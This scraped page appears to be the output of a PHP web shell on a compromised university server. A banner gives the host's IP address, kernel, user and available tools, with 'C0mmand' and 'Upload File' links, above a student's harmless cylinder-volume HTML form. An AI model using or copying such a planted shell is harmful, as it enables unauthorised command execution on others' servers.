Server IP : 172.16.15.8 / Your IP : 3.147.65.47 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/rlbarner/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!-- File Name: radiusheightform.html Author: Regina Barner Date: 12 February 2013 Instructor: Dr. Wang Goal: Create an HTML page to receive the radius and height of a cylinder, and a PHP script page that outputs the volume. --> <TITLE>Assignment 2a: Volume Calculator</TITLE> <BODY BGCOLOR="#D9D9F3"> <FONT FACE="Sylfaen"> <CENTER> <H2>Cylinder Volume Calculator</H2> <HR> <Form action=volumeaction.php method=post> Type in the radius: <INPUT type=text name=radius> <BR> Type in the height: <INPUT type=text name=height> <BR> <INPUT type=submit value=Submit> <INPUT type=reset value=Reset> <BR> <HR> <A HREF=index.html>Index</A> </Form> </CENTER> </FONT> </BODY>